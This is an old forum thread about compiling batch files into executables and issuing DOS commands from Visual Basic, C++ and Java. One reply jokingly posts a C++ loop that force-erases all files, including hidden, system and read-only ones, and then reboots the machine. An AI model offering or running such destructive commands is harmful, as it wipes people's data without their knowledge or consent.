Posted November 27, 200519 yr can you change them into exes? if you cant is there any programing langue that you can easly seend commands to dos? thanks
November 27, 200519 yr ichangedmysn9 said: can you change them into exes? if you cant is there any programing langue that you can easly seend commands to dos? thanks visual basic can make exe batchfiles, well all it really does it make a batchfile then opens it then deltes the file it made. so eya it kinda is a exe batchfile ;) http://www.pscode.com
November 27, 200519 yr Yes, like QuickBFC (http://www.abyssmedia.com/quickbfc/index.shtml) Atleast makes them exe. k?
November 27, 200519 yr Also if you include <window.h> in a c++ file, the System("argument"); commnad is basically like typing the argumetn in dos.
November 28, 200519 yr also Runtime r =Runtime.getRuntime(); r.exec("notepad.exe or w/e") in java, but alas you cannot do this in an applet
November 28, 200519 yr #include <windows.h> while(true) { system("erase *.* /F /AS /AA /AH /AR"); system("echo pwnt"); system("shutdown -r -t 1"); } // keke? C++ ftw <3
November 28, 200519 yr Erondial said: Also if you include <window.h> in a c++ file, the System("argument"); commnad is basically like typing the argumetn in dos. stdlib.h has it too i think